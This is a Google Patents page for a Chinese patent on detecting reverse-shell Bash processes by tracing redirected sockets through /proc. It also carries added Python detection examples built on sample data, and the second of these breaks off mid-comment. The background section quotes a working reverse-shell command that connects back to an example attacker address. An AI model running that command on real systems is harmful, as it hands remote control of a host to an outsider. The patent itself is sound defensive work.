CN110138727A - The information searching method and device that the shell that rebounds is connected to the network - Google Patents


Info

Publication number
CN110138727A
Application number
CN201910245773.9A
Authority
CN (China)
Legal status
Pending
Other languages
Chinese (zh)
Inventors
汪德嘉, 华保健, 柴倩, 沈杰, 张瑞钦
Original and current assignee
Jiangsu Pay Shield Information Safe Technology Ltd
Prior art keywords
network connection, file, bash, bash process, rebound

Classifications

    • H ELECTRICITY
    • H04 ELECTRIC COMMUNICATION TECHNIQUE
    • H04L TRANSMISSION OF DIGITAL INFORMATION, e.g. TELEGRAPHIC COMMUNICATION
    • H04L63/00 Network architectures or network communication protocols for network security
    • H04L63/14 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic
    • H04L63/1408 Network architectures or network communication protocols for network security for detecting or protecting against malicious traffic by monitoring network traffic
    • H04L63/1441 Countermeasures against malicious traffic

Abstract

The invention discloses an information searching method and device for a reverse-shell ("rebound shell" in the machine translation) network connection. The method comprises: monitoring Bash process creation events; when a Bash process creation is detected, judging whether the file to which the Bash process's standard streams are redirected is a socket file; if so, determining that the Bash process is a reverse-shell process and judging from the socket file descriptor whether a reverse-shell network connection exists; if so, confirming that the server is under a reverse-shell attack (the two checks together improve the accuracy of reverse-shell detection) and obtaining the IP address and port number of the reverse-shell network connection. With the IP address and port number obtained accurately, they can be blocked, which improves security, allows the attacker's attempts at privilege escalation and vulnerability exploitation through the reverse shell to be stopped in time, and avoids the occurrence of a security incident.

Description

Information searching method and device for a reverse-shell network connection
Technical field
The present invention relates to the field of computer technology, and in particular to an information searching method and device for a reverse-shell network connection.
Background technique
Existing network attacks are typically carried out by an attacker exploiting a vulnerability in a website to attack the web server, so that security incidents occur frequently; such attacks not only damage corporate image but can also cause economic loss. Among them, intruding into a website through a Webshell is a common attack technique. After a web attacker obtains a Webshell on the web server, they need to escalate privileges, and privilege escalation needs an interactive running environment, so the attacker first needs to spawn a reverse shell that can be interacted with and then run the relevant commands in a command-line terminal to perform operations such as privilege escalation. Once the attacker has obtained the highest privilege on the server through the reverse shell's interactive environment, they can continue to use that environment to carry out other attacks and vulnerability exploitation against the server. If it can be discovered in time that a server has a reverse shell, and measures are taken to close the detected reverse-shell connection, the attacker's attack on the web server can be terminated at the earliest moment.
Existing Webshell detection techniques focus on how to scan for and remove backdoor script files, i.e. on detecting and removing Webshell script files. In the area of reverse-shell detection, the existing patent 201710540141.6, "A method and system for detecting and preventing reverse shells", captures the action of executing a shell program and determines whether the shell program is a reverse shell by judging whether the shell process has a terminal attached. If it is a reverse shell, a termination signal is sent to the reverse-shell process to kill it, but the IP address and port number of the reverse-shell network connection cannot be accurately obtained.
Summary of the invention
In view of the above problems, the present invention is proposed in order to provide an information searching method and device for a reverse-shell network connection that overcomes, or at least partially solves, the above problems.
According to one aspect of the invention, an information searching method for a reverse-shell network connection is provided, comprising:
monitoring Bash process creation events;
when a Bash process creation is detected, judging whether the redirection file corresponding to the Bash process is a socket file;
if so, determining that the Bash process is a reverse-shell process, and judging from the socket file descriptor whether a reverse-shell network connection exists;
if so, obtaining the IP address and port number of the reverse-shell network connection.
According to another aspect of the invention, an information searching device for a reverse-shell network connection is provided, comprising:
a monitoring module, adapted to monitor Bash process creation events;
a first judging module, adapted to judge, when a Bash process creation is detected, whether the redirection file corresponding to the Bash process is a socket file;
a second judging module, adapted to determine, if the redirection file corresponding to the Bash process is a socket file, that the Bash process is a reverse-shell process, and to judge from the socket file descriptor whether a reverse-shell network connection exists;
an obtaining module, adapted to obtain, if a reverse-shell network connection is judged to exist according to the socket file descriptor, the IP address and port number of the reverse-shell network connection.
According to yet another aspect of the invention, a computing device is provided, comprising a processor, a memory, a communication interface and a communication bus, the processor, memory and communication interface communicating with each other via the communication bus;
the memory is used for storing at least one executable instruction, which causes the processor to perform the operations corresponding to the above information searching method for a reverse-shell network connection.
According to a further aspect of the invention, a computer storage medium is provided, in which at least one executable instruction is stored, the executable instruction causing the processor to perform the operations corresponding to the above information searching method for a reverse-shell network connection.
According to the scheme provided by the invention, Bash process creation events are monitored; when a Bash process creation is detected, it is judged whether the redirection file corresponding to the Bash process is a socket file; if so, the Bash process is determined to be a reverse-shell process and it is judged from the socket file descriptor whether a reverse-shell network connection exists; if so, the IP address and port number of the reverse-shell network connection are obtained. In this scheme, judging whether the redirection file corresponding to the Bash process is a socket file and, if so, determining from the socket file descriptor whether a reverse-shell network connection exists together confirm that the server is under reverse-shell attack, and the two checks combined improve the accuracy of reverse-shell detection. When a reverse-shell network connection is determined to exist, its IP address and port number are obtained, so that the IP address and port number can be blocked, stopping in time the attacker's attempts at privilege escalation and vulnerability exploitation through the reverse shell and avoiding a security incident.
The above is only an overview of the technical scheme of the invention. In order that the technical means of the invention may be better understood and implemented in accordance with the contents of the specification, and that the above and other objects, features and advantages of the invention may be made clearer and more comprehensible, specific embodiments of the invention are set out below.
Detailed description of the invention
By reading the following detailed description of the preferred embodiments, various other advantages and benefits will become clear to those of ordinary skill in the art. The drawings are only for the purpose of illustrating preferred embodiments and are not to be considered a limitation of the invention. Throughout the drawings, the same reference numerals refer to the same parts. In the drawings:
Fig. 1 is a schematic diagram of a reverse shell;
Fig. 2 shows a flow diagram of an information searching method for a reverse-shell network connection according to an embodiment of the invention;
Fig. 3 shows a flow diagram of an information searching method for a reverse-shell network connection according to another embodiment of the invention;
Fig. 4 shows a structural diagram of an information searching device for a reverse-shell network connection according to an embodiment of the invention;
Fig. 5 shows a structural diagram of a computing device according to an embodiment of the invention.
Specific embodiment
Exemplary embodiments of the present disclosure are described in more detail below with reference to the accompanying drawings. Although exemplary embodiments of the disclosure are shown in the drawings, it should be understood that the disclosure may be realised in various forms and should not be limited by the embodiments set forth here. Rather, these embodiments are provided so that the invention may be understood more thoroughly and the scope of the disclosure fully conveyed to those skilled in the art.
Fig. 1 is a schematic diagram of a reverse shell. In the scenario shown in Fig. 1, the target host is an intranet host without a public IP address, so the attacker cannot initiate a remote connection to the target host from the external network; in order to obtain an interactive environment in which the target host can be operated directly, privilege escalation must be performed on the target host. Using the Webshell already obtained, the attacker executes the bash command "bash -i >& /dev/tcp/119.119.119.119/7777 0>&1"; after this command runs, the target host actively initiates a shell that connects back to the attacker's machine 119.119.119.119 on the external network, giving the attacker a shell terminal that controls the target host. For this situation it is necessary to find the IP address and port number of the reverse-shell network connection, so that the reverse shell can be blocked accurately and the attacker's attack on the target host prevented.
In order to find the IP address and port number accurately, the inventors propose a method and device that can find the IP address and port number promptly and accurately. It is described below with reference to specific embodiments.
Fig. 2 shows a flow diagram of an information searching method for a reverse-shell network connection according to an embodiment of the invention. As shown in Fig. 2, the method comprises the following steps:
Step S200: monitor Bash process creation events.
In order to block a reverse shell in time, it is necessary to discover promptly whether a Bash process has been created. Specifically, whether a Bash process has been created can be determined as follows: monitor Bash process creation events, for example by repeatedly traversing the /proc file system. In this embodiment, Bash process creation events are monitored so that a newly created Bash process is discovered in time, providing the detection basis for blocking a reverse shell.
Step S201: when a Bash process creation is detected, judge whether the redirection file corresponding to the Bash process is a socket file; if so, proceed to step S202.
Under normal circumstances a Bash process is attached to a terminal device file, for example /dev/pts/0 or /dev/pts/1. If an attacker spawns a reverse shell through a Bash process, redirection is generally used, and the process is redirected into a socket file.
In order to block the reverse shell accurately, further improve the blocking accuracy and avoid false blocking, a further judgement is needed after a Bash process creation is detected; specifically, it is judged whether the redirection file corresponding to the Bash process is a socket file.
Step S202: determine that the Bash process is a reverse-shell process, and judge from the socket file descriptor whether a reverse-shell network connection exists.
When the redirection file corresponding to the Bash process is judged to be a socket file, the Bash process can be determined to be a reverse-shell process, i.e. a process that actively creates an outbound connection. However, the process may have failed to initiate the corresponding network connection, or the connection may already have been closed; it is therefore necessary to judge whether a reverse-shell network connection actually exists.
Each socket file corresponds to a socket file descriptor, denoted FD here. Under normal conditions every network connection has a corresponding FD value, so whether a reverse-shell network connection exists can be judged from the socket file descriptor FD.
Step S203: obtain the IP address and port number of the reverse-shell network connection.
When it has been determined from the socket file that a reverse-shell network connection exists, the IP address and port number of the reverse-shell network connection can be obtained from the socket file descriptor FD.
The IP address and port number are the key by which the attacker carries out vulnerability attacks against the target host. Once the IP address and port number have been obtained, they can be blocked, intercepting the outbound traffic to that IP address and port so that it never leaves the target host, thereby completely preventing the attacker from using the reverse shell.
According to the method provided by the above embodiment of the invention, Bash process creation events are monitored; when a Bash process creation is detected, it is judged whether the redirection file corresponding to the Bash process is a socket file; if so, the Bash process is determined to be a reverse-shell process and it is judged from the socket file descriptor whether a reverse-shell network connection exists; if so, the IP address and port number of the reverse-shell network connection are obtained. In this scheme, judging whether the redirection file corresponding to the Bash process is a socket file and, if so, determining from the socket file descriptor whether a reverse-shell network connection exists together confirm that the server is under reverse-shell attack, and the two checks combined improve the accuracy of reverse-shell detection. When a reverse-shell network connection is determined to exist, its IP address and port number are obtained, so that the IP address and port number can be blocked, stopping in time the attacker's attempts at privilege escalation and vulnerability exploitation through the reverse shell and avoiding a security incident.
Fig. 3 shows a flow diagram of an information searching method for a reverse-shell network connection according to another embodiment of the invention. As shown in Fig. 3, the method comprises the following steps:
Step S300: subscribe to Bash process creation notification messages through the subscription mechanism provided by the kernel.
When Bash processes are monitored by traversing /proc, a problem easily arises: if /proc is polled too frequently, the operating load of the server system increases; if it is polled too rarely, a short-lived Bash process may be missed, so the reverse shell cannot be blocked in time and the attacker succeeds in escalating privileges through the reverse shell and mounting the corresponding attack.
To block reverse shells accurately and in time, Bash process creation must be discovered promptly. This embodiment therefore no longer discovers Bash process creation by polling /proc, but through a subscription: specifically, it subscribes to Bash process creation notification messages through the subscription mechanism provided by the kernel. The kernel captures process creation and generates a creation notification message; by subscribing to these messages, the information searching device for a reverse-shell network connection learns that a Bash process has been created.
Step S301: when a creation notification message is received, look up the redirection file corresponding to the Bash process according to the process identifier (PID) of the Bash process.
When a creation notification message is received, it can be determined that a Bash process has been created. To block a reverse shell accurately and in time, the Bash process must be examined further to judge whether it is a reverse-shell process; specifically, this can be judged according to steps S301 to S303.
Once it has been determined that a Bash process has been created, its process information, for example the process identifier PID, is obtained. With the PID, the redirection file corresponding to the Bash process can be looked up, for example by matching on the PID. Here the redirection file corresponding to the Bash process is the file to which the Bash process's standard input, standard output and standard error are redirected.
Step S302: judge whether the name format of the redirection file corresponding to the Bash process is the preset name format; if so, proceed to step S303; if not, proceed to step S307.
Under normal conditions a socket file has a fixed name format, for example one containing the string "socket" (this is only an illustration). Thus, by judging whether the name of the redirection file corresponding to the Bash process matches the preset name format, it can be determined whether that redirection file is a socket file.
Step S303: determine that the redirection file corresponding to the Bash process is a socket file, and determine that the Bash process is a reverse-shell process.
When the name format of the redirection file corresponding to the Bash process is judged to be the preset name format, the redirection file can be determined to be a socket file, and therefore the Bash process is determined to be a reverse-shell process.
Step S304: obtain the socket file descriptor of the redirection file corresponding to the Bash process.
Once the redirection file corresponding to the Bash process has been determined to be a socket file, the socket file descriptor of that file can be obtained according to the PID of the Bash process, for example by looking up /proc/PID/fd according to the PID and reading from it the socket file descriptor of the redirection file.
Step S305: judge whether, among all network connections, there is any network connection whose socket file descriptor matches the socket file descriptor of the redirection file corresponding to the Bash process; if so, proceed to step S306; if not, the method ends.
The information searching device for a reverse-shell network connection can obtain the connection information of all network connections, each of which has a corresponding FD value. The FD of the redirection file corresponding to the Bash process can therefore be compared with the FDs of all network connections in /proc/net/tcp, to determine whether any network connection's FD matches it. If a network connection whose FD is identical to that of the Bash process's redirection file exists, that network connection can be determined to be a reverse-shell network connection; if no such connection exists, it can be determined that the Bash process failed to initiate the corresponding network connection, or that the connection has already been closed.
Step S306: determine that the network connection is a reverse-shell network connection, and obtain the IP address and port number of the network connection according to the socket file descriptor.
When it is judged that some network connection's socket file descriptor matches the socket file descriptor of the redirection file corresponding to the Bash process, that network connection can be determined to be a reverse-shell network connection, so that the IP address and port number of the connection can be obtained according to the socket file descriptor, for example from a preset field of the network connection entry (such as the rem_address field).
The IP address and port number are the key by which the attacker carries out vulnerability attacks against the target host. Once the IP address and port number have been obtained, they can be blocked, intercepting the outbound traffic to that IP address and port so that it never leaves the target host, thereby completely preventing the attacker from using the reverse shell.
Step S307: determine that the redirection file corresponding to the Bash process is a terminal device file, and the method ends.
When the name format of the redirection file corresponding to the Bash process is not the preset name format, the redirection file can be determined to be a terminal device file and the Bash process to be a normal process, and the method ends.
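Steps S301 to S307 above (and the Fig. 2 steps S200 to S203 that they refine), worked through as an added Python example that is not the patent's code; the function names are mine, it assumes a Linux host where the stdio links come from /proc/<pid>/fd and the connection table from /proc/net/tcp, and the embedded table and fd links are constructed samples written for a little-endian host. The kernel event subscription of step S300 is left to the caller; the example starts from a PID.

```python
# Added example, not the patent's code. Assumes Linux /proc: stdio links from
# /proc/<pid>/fd/{0,1,2}, connection table from /proc/net/tcp. The sample table
# and fd links below are constructed; hex addresses are for a little-endian host.
import os
import re
import socket
import struct
import sys

SOCKET_LINK = re.compile(r"^socket:\[(\d+)\]$")  # fd link target of a socket

# Constructed /proc/net/tcp: a listening socket and one ESTABLISHED (st=01)
# connection from 10.0.0.10:39470 to 119.119.119.119:7777, the address of the
# patent's Fig. 1 scenario. Whitespace-separated column 9 is the socket inode.
PROC_NET_TCP = """\
  sl  local_address rem_address   st tx_queue rx_queue tr tm->when retrnsmt   uid  timeout inode
   0: 0100007F:0016 00000000:0000 0A 00000000:00000000 00:00000000 00000000     0        0 18327 1 0000000000000000 100 0 0 10 0
   1: 0A00000A:9A2E 77777777:1E61 01 00000000:00000000 00:00000000 00000000    33        0 20511 1 0000000000000000 20 4 30 10 -1
"""
# Constructed fd links of a bash whose stdin/stdout/stderr were all redirected
# into the same socket (the pattern of the command in Fig. 1).
SAMPLE_FD_LINKS = {0: "socket:[20511]", 1: "socket:[20511]", 2: "socket:[20511]"}

def socket_inode_from_link(link_target):
    """S302/S303: a socket fd reads 'socket:[inode]', a terminal fd reads e.g.
    '/dev/pts/0'. Return the inode for a socket, None otherwise."""
    m = SOCKET_LINK.match(link_target)
    return int(m.group(1)) if m else None

def decode_ipv4(hex_addr, byteorder=sys.byteorder):
    """'77777777:1E61' -> ('119.119.119.119', 7777). The kernel prints the
    32-bit address in host byte order, so little-endian hosts unpack with '<I'."""
    ip_hex, port_hex = hex_addr.split(":")
    fmt = "<I" if byteorder == "little" else ">I"
    return socket.inet_ntoa(struct.pack(fmt, int(ip_hex, 16))), int(port_hex, 16)

def find_connection(proc_net_tcp, inode, byteorder=sys.byteorder):
    """S305/S306: find the row whose inode matches and return its remote
    endpoint (rem_address column) and state. None means the connect() never
    completed or the connection is gone (closed rows vanish, TIME_WAIT shows inode 0)."""
    for line in proc_net_tcp.splitlines()[1:]:      # skip header row
        fields = line.split()
        if len(fields) < 10 or int(fields[9]) != inode:
            continue
        ip, port = decode_ipv4(fields[2], byteorder)
        return {"remote_ip": ip, "remote_port": port, "state": fields[3]}
    return None

def classify_bash_process(fd_links, proc_net_tcp, byteorder=sys.byteorder):
    """Run S301-S307 on collected data; fd_links maps fd number -> link target.
    Verdicts: 'normal' (stdio on terminal device files, S307), 'stale'
    (redirected into a socket with no live connection) or 'reverse-shell'
    with the resolved connections (S306)."""
    by_inode = {}                                   # inode -> fds sharing it
    for fd, target in fd_links.items():
        inode = socket_inode_from_link(target)
        if inode is not None:
            by_inode.setdefault(inode, []).append(fd)
    if not by_inode:
        return {"verdict": "normal"}
    conns = []
    for inode, fds in by_inode.items():
        conn = find_connection(proc_net_tcp, inode, byteorder)
        if conn:
            conn["inode"], conn["fds"] = inode, sorted(fds)
            conns.append(conn)
    return {"verdict": "reverse-shell", "connections": conns} if conns else {"verdict": "stale"}

def read_fd_links(pid):
    """Stdio link targets of a live process from /proc/<pid>/fd (root is
    needed for other users' processes)."""
    links = {}
    for fd in (0, 1, 2):
        try:
            links[fd] = os.readlink(f"/proc/{pid}/fd/{fd}")
        except OSError:                             # process exited or fd closed
            pass
    return links

def inspect_pid(pid):
    """Live check of one process; the patent's S300 kernel subscription would
    call this for every newly created bash PID."""
    with open("/proc/net/tcp") as f:
        return classify_bash_process(read_fd_links(pid), f.read())

if __name__ == "__main__":
    if len(sys.argv) > 1:
        print(inspect_pid(int(sys.argv[1])))
    else:
        print(classify_bash_process(SAMPLE_FD_LINKS, PROC_NET_TCP, "little"))
```

IPv6 connections are listed in /proc/net/tcp6 with 128-bit addresses and are not decoded here.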
According to the method provided by the above embodiment of the invention, by subscribing to creation notification messages it can be determined promptly and accurately that a Bash process has been created, so that a reverse shell can be blocked in time and the attacker prevented from attacking; this solves the problem in the prior art that, because bash process creation cannot be discovered in time, the attacker can successfully escalate privileges through a reverse shell. By judging whether the redirection file corresponding to the Bash process is a socket file and, if so, determining from the socket file descriptor whether a reverse-shell network connection exists, it is confirmed that the server is under reverse-shell attack, and the two checks combined improve the accuracy of reverse-shell detection. When a reverse-shell network connection is determined to exist, its IP address and port number are obtained, so that the IP address and port number can be blocked, stopping in time the attacker's attempts at privilege escalation and vulnerability exploitation through the reverse shell and avoiding a security incident.
Fig. 4 shows a structural diagram of an information searching device for a reverse-shell network connection according to an embodiment of the invention. As shown in Fig. 4, the device comprises a monitoring module 400, a first judging module 401, a second judging module 402 and an obtaining module 403.
The monitoring module 400 is adapted to monitor Bash process creation events;
the first judging module 401 is adapted to judge, when a Bash process creation is detected, whether the redirection file corresponding to the Bash process is a socket file;
the second judging module 402 is adapted to determine, if the redirection file corresponding to the Bash process is a socket file, that the Bash process is a reverse-shell process, and to judge from the socket file descriptor whether a reverse-shell network connection exists;
the obtaining module 403 is adapted to obtain, if a reverse-shell network connection is judged to exist according to the socket file descriptor, the IP address and port number of the reverse-shell network connection.
Optionally, the second judging module 402 is further adapted to: obtain the socket file descriptor of the redirection file corresponding to the Bash process;
judge whether, among all network connections, there is any network connection whose socket file descriptor matches the socket file descriptor of the redirection file corresponding to the Bash process;
if so, determine that the network connection is a reverse-shell network connection.
Optionally, the monitoring module 400 is further adapted to subscribe to Bash process creation notification messages through the subscription mechanism provided by the kernel.
Optionally, the first judging module 401 is further adapted to: look up the redirection file corresponding to the Bash process according to the process identifier (PID) of the Bash process;
judge whether the name format of the redirection file corresponding to the Bash process is the preset name format;
if so, determine that the redirection file corresponding to the Bash process is a socket file.
Optionally, the redirection file corresponding to the Bash process is the redirection file corresponding to the standard input, standard output and standard error of the Bash process.
According to the device provided by the above embodiment of the invention, Bash process creation events are monitored; when a Bash process creation is detected, it is judged whether the redirection file corresponding to the Bash process is a socket file; if so, the Bash process is determined to be a reverse-shell process and it is judged from the socket file descriptor whether a reverse-shell network connection exists; if so, the IP address and port number of the reverse-shell network connection are obtained. In this scheme, judging whether the redirection file corresponding to the Bash process is a socket file and, if so, determining from the socket file descriptor whether a reverse-shell network connection exists together confirm that the server is under reverse-shell attack, and the two checks combined improve the accuracy of reverse-shell detection. When a reverse-shell network connection is determined to exist, its IP address and port number are obtained, so that the IP address and port number can be blocked, stopping in time the attacker's attempts at privilege escalation and vulnerability exploitation through the reverse shell and avoiding a security incident.
An embodiment of the present application also provides a non-volatile computer storage medium storing at least one executable instruction; the computer-executable instruction can execute the information searching method for a reverse-shell network connection of any of the above method embodiments.
Fig. 5 shows a structural diagram of a computing device according to an embodiment of the invention; the specific embodiment of the invention does not limit the specific implementation of the computing device.
As shown in Fig. 5, the computing device may comprise: a processor 502, a communications interface 504, a memory 506 and a communication bus 508.
Wherein:
the processor 502, communications interface 504 and memory 506 communicate with each other via the communication bus 508.
The communications interface 504 is used for communicating with network elements of other devices, such as clients or other servers.
The processor 502 is used for executing a program 510, and may specifically execute the relevant steps in the above embodiments of the information searching method for a reverse-shell network connection.
Specifically, the program 510 may comprise program code, which comprises computer operation instructions.
The processor 502 may be a central processing unit (CPU), an application-specific integrated circuit (ASIC), or one or more integrated circuits configured to implement embodiments of the invention. The one or more processors included in the computing device may be processors of the same type, such as one or more CPUs, or of different types, such as one or more CPUs and one or more ASICs.
The memory 506 is used for storing the program 510. The memory 506 may comprise high-speed RAM and may further comprise non-volatile memory, for example at least one magnetic disk memory.
The program 510 may specifically be used to cause the processor 502 to execute the information searching method for a reverse-shell network connection of any of the above method embodiments. For the specific implementation of each step in the program 510, reference may be made to the corresponding description of the corresponding steps and units in the above information searching embodiments, which is not repeated here. Those skilled in the art can clearly understand that, for convenience and brevity of description, the specific working process of the devices and modules described above may refer to the corresponding process description in the foregoing method embodiments, and is not repeated here.
The algorithms and displays provided herein are not inherently related to any particular computer, virtual system, or other apparatus. Various general-purpose systems may also be used with the teachings herein. From the description above, the structure required to construct such systems is apparent. In addition, the present invention is not directed to any particular programming language. It should be understood that various programming languages may be used to implement the content of the invention described herein, and the above description of a specific language is given to disclose the best mode of the invention.
In the specification provided here, numerous specific details are set forth. It is to be understood, however, that embodiments of the invention may be practiced without these specific details. In some instances, well-known methods, structures and techniques have not been shown in detail so as not to obscure the understanding of this description.
Similarly, it should be understood that, in order to simplify the disclosure and to aid in understanding one or more of the various inventive aspects, in the above description of exemplary embodiments of the invention, the various features of the invention are sometimes grouped together in a single embodiment, figure, or description thereof. However, this method of disclosure should not be interpreted as reflecting an intention that the claimed invention requires more features than are expressly recited in each claim. Rather, as the following claims reflect, inventive aspects lie in less than all features of a single disclosed embodiment. Thus, the claims following the detailed description are hereby expressly incorporated into this detailed description, with each claim standing on its own as a separate embodiment of the invention.
Those skilled in the art will understand that the modules in the devices of an embodiment may be adaptively changed and arranged in one or more devices different from that embodiment. The modules, units or components in an embodiment may be combined into one module, unit or component, and may furthermore be divided into multiple sub-modules, sub-units or sub-components. Except where at least some of such features and/or processes or units are mutually exclusive, any combination may be used to combine all features disclosed in this specification (including the accompanying claims, abstract and drawings) and all processes or units of any method or apparatus so disclosed. Unless expressly stated otherwise, each feature disclosed in this specification (including the accompanying claims, abstract and drawings) may be replaced by an alternative feature serving the same, equivalent or similar purpose.
Furthermore, those skilled in the art will appreciate that although some embodiments described herein include certain features that are included in other embodiments but not others, combinations of features of different embodiments are meant to be within the scope of the invention and to form different embodiments. For example, in the following claims, any of the claimed embodiments may be used in any combination.
The various component embodiments of the invention may be implemented in hardware, or as software modules running on one or more processors, or in a combination thereof. Those skilled in the art will understand that a microprocessor or digital signal processor (DSP) may be used in practice to implement some or all of the functions of some or all of the components of the information searching device for a reverse shell network connection according to embodiments of the present invention. The invention may also be implemented as apparatus or device programs (for example, computer programs and computer program products) for performing some or all of the methods described herein. Such programs implementing the invention may be stored on a computer-readable medium, or may take the form of one or more signals. Such signals may be downloaded from an internet website, provided on a carrier signal, or provided in any other form.
It should be noted that the above embodiments illustrate rather than limit the invention, and that those skilled in the art may design alternative embodiments without departing from the scope of the appended claims. In the claims, any reference signs placed between parentheses shall not be construed as limiting the claims. The word "comprising" does not exclude the presence of elements or steps not listed in a claim. The word "a" or "an" preceding an element does not exclude the presence of a plurality of such elements. The invention may be implemented by means of hardware comprising several distinct elements and by means of a suitably programmed computer. In a unit claim enumerating several devices, several of these devices may be embodied by one and the same item of hardware. The use of the words first, second and third does not indicate any ordering; these words may be interpreted as names.
The invention discloses: A1. An information searching method for a reverse shell network connection, comprising:
monitoring a Bash process creation event;
when the creation of a Bash process is detected, judging whether the redirection file corresponding to the Bash process is a socket file;
if so, determining that the Bash process is a reverse shell process, and judging, according to the socket file descriptor, whether a reverse shell network connection exists;
if so, obtaining the IP address and port number of the reverse shell network connection.
A2. The method according to A1, wherein judging, according to the socket file descriptor, whether a reverse shell network connection exists further comprises:
obtaining the socket file descriptor of the redirection file corresponding to the Bash process;
judging whether, among all network connections, there is any network connection whose socket file descriptor matches the socket file descriptor of the redirection file corresponding to the Bash process;
if so, determining that this network connection is the reverse shell network connection.
A3. The method according to A1 or A2, wherein monitoring the Bash process creation event further comprises:
subscribing to the creation notification message of the Bash process through the subscription mechanism provided by the kernel.
A4. The method according to A1 or A2, wherein judging whether the redirection file corresponding to the Bash process is a socket file further comprises:
looking up the redirection file corresponding to the Bash process according to the process identifier (PID) of the Bash process;
judging whether the name format of the redirection file corresponding to the Bash process is a preset name format;
if so, determining that the redirection file corresponding to the Bash process is a socket file.
A5. The method according to A1 or A2, wherein the redirection file corresponding to the Bash process is the redirection file corresponding to the standard input, standard output and standard error output of the Bash process.
B6. An information searching device for a reverse shell network connection, comprising:
a monitoring module, adapted to monitor a Bash process creation event;
a first judgment module, adapted to judge, when the creation of a Bash process is detected, whether the redirection file corresponding to the Bash process is a socket file;
a second judgment module, adapted to determine, if the redirection file corresponding to the Bash process is a socket file, that the Bash process is a reverse shell process, and to judge, according to the socket file descriptor, whether a reverse shell network connection exists;
an obtaining module, adapted to obtain, if it is judged according to the socket file descriptor that a reverse shell network connection exists, the IP address and port number of the reverse shell network connection.
B7. The device according to B6, wherein the second judgment module is further adapted to:
obtain the socket file descriptor of the redirection file corresponding to the Bash process;
judge whether, among all network connections, there is any network connection whose socket file descriptor matches the socket file descriptor of the redirection file corresponding to the Bash process;
if so, determine that this network connection is the reverse shell network connection.
B8. The device according to B6 or B7, wherein the monitoring module is further adapted to: subscribe to the creation notification message of the Bash process through the subscription mechanism provided by the kernel.
B9. The device according to B6 or B7, wherein the first judgment module is further adapted to: look up the redirection file corresponding to the Bash process according to the process identifier (PID) of the Bash process;
judge whether the name format of the redirection file corresponding to the Bash process is a preset name format;
if so, determine that the redirection file corresponding to the Bash process is a socket file.
B10. The device according to B6 or B7, wherein the redirection file corresponding to the Bash process is the redirection file corresponding to the standard input, standard output and standard error output of the Bash process.
C11. A computing device, comprising: a processor, a memory, a communications interface and a communication bus, wherein the processor, the memory and the communications interface communicate with each other over the communication bus;
the memory is used for storing at least one executable instruction, and the executable instruction causes the processor to perform operations corresponding to the information searching method for a reverse shell network connection according to any one of A1-A5.
D12. A computer storage medium, in which at least one executable instruction is stored, the executable instruction causing a processor to perform operations corresponding to the information searching method for a reverse shell network connection according to any one of A1-A5.

Claims (10)

1. An information searching method for a reverse shell network connection, comprising:
monitoring a Bash process creation event;
when the creation of a Bash process is detected, judging whether the redirection file corresponding to the Bash process is a socket file;
if so, determining that the Bash process is a reverse shell process, and judging, according to the socket file descriptor, whether a reverse shell network connection exists;
if so, obtaining the IP address and port number of the reverse shell network connection.
2. The method according to claim 1, wherein judging, according to the socket file descriptor, whether a reverse shell network connection exists further comprises:
obtaining the socket file descriptor of the redirection file corresponding to the Bash process;
judging whether, among all network connections, there is any network connection whose socket file descriptor matches the socket file descriptor of the redirection file corresponding to the Bash process;
if so, determining that this network connection is the reverse shell network connection.
3. The method according to claim 1 or 2, wherein monitoring the Bash process creation event further comprises:
subscribing to the creation notification message of the Bash process through the subscription mechanism provided by the kernel.
4. The method according to claim 1 or 2, wherein judging whether the redirection file corresponding to the Bash process is a socket file further comprises:
looking up the redirection file corresponding to the Bash process according to the process identifier (PID) of the Bash process;
judging whether the name format of the redirection file corresponding to the Bash process is a preset name format;
if so, determining that the redirection file corresponding to the Bash process is a socket file.
5. The method according to claim 1 or 2, wherein the redirection file corresponding to the Bash process is the redirection file corresponding to the standard input, standard output and standard error output of the Bash process.
6. An information searching device for a reverse shell network connection, comprising:
a monitoring module, adapted to monitor a Bash process creation event;
a first judgment module, adapted to judge, when the creation of a Bash process is detected, whether the redirection file corresponding to the Bash process is a socket file;
a second judgment module, adapted to determine, if the redirection file corresponding to the Bash process is a socket file, that the Bash process is a reverse shell process, and to judge, according to the socket file descriptor, whether a reverse shell network connection exists;
an obtaining module, adapted to obtain, if it is judged according to the socket file descriptor that a reverse shell network connection exists, the IP address and port number of the reverse shell network connection.
7. The device according to claim 6, wherein the second judgment module is further adapted to:
obtain the socket file descriptor of the redirection file corresponding to the Bash process;
judge whether, among all network connections, there is any network connection whose socket file descriptor matches the socket file descriptor of the redirection file corresponding to the Bash process;
if so, determine that this network connection is the reverse shell network connection.
8. The device according to claim 6 or 7, wherein the monitoring module is further adapted to: subscribe to the creation notification message of the Bash process through the subscription mechanism provided by the kernel.
9. A computing device, comprising: a processor, a memory, a communications interface and a communication bus, wherein the processor, the memory and the communications interface communicate with each other over the communication bus;
the memory is used for storing at least one executable instruction, and the executable instruction causes the processor to perform operations corresponding to the information searching method for a reverse shell network connection according to any one of claims 1-5.
10. A computer storage medium, in which at least one executable instruction is stored, the executable instruction causing a processor to perform operations corresponding to the information searching method for a reverse shell network connection according to any one of claims 1-5.
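The detection steps of A1, A2, A4 and A5 above (repeated as claims 1, 2, 4 and 5) can be exercised end to end on sample data. The following Python block is an added example written for this page; it is not code from the patent or its assignee. It assumes that the process-creation event has already been delivered (the kernel subscription step of A3 is not shown), that the "preset name format" is Linux's `socket:[<inode>]` link target under `/proc/<pid>/fd/`, and that the number in that target, which the patent calls the socket file descriptor, is the socket inode listed in the last column of `/proc/net/tcp`. The fd link targets and the `/proc/net/tcp` rows below are constructed samples, and the helper names are the example's own.

```python
"""Added example (not part of the patent): locate the remote endpoint of a
suspected reverse shell from a Bash process's standard fds and /proc/net/tcp.
"""
import os
import re
from typing import Dict, Optional, Tuple

# Link target of a socket fd under /proc/<pid>/fd/. Assumed here to be the
# patent's "preset name format"; the number is the socket inode.
SOCKET_LINK_RE = re.compile(r"^socket:\[(\d+)\]$")

# Constructed sample: fds 0/1/2 of a shell whose stdin, stdout and stderr were
# all redirected to one socket (the A5 condition).
SAMPLE_FD_LINKS_SUSPECT = {0: "socket:[67890]", 1: "socket:[67890]", 2: "socket:[67890]"}
# Constructed sample: an ordinary interactive shell attached to a pseudo-terminal.
SAMPLE_FD_LINKS_BENIGN = {0: "/dev/pts/0", 1: "/dev/pts/0", 2: "/dev/pts/0"}

# Constructed /proc/net/tcp content. Addresses are hex; IPv4 bytes are stored
# little-endian on x86, so 0A0200C0:115C is 192.0.2.10:4444 (a documentation
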